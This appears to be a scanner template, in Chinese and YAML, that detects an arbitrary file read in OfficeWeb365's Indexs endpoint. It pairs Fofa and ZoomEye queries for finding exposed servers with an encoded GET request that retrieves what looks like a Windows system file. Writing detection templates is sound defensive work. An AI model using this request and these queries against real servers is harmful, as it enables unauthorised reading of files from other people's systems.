漏洞描述
officeWeb365 Indexs接口存在任意文件读取
Fofa: body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"
ZoomEye: app:"OfficeWeb365"
id: office365-indexs-fileread
info:
name: officeWeb365 Indexs接口存在任意文件读取
author: zan8in
severity: high
verfied: true
description: |
officeWeb365 Indexs接口存在任意文件读取
Fofa: body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"
ZoomEye: app:"OfficeWeb365"
reference:
- https://mp.weixin.qq.com/s/Sgi24orgxyfrUpsbI95kAw
tags: office365,fileread
created: 2024/01/05
rules:
r0:
request:
method: GET
path: /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0()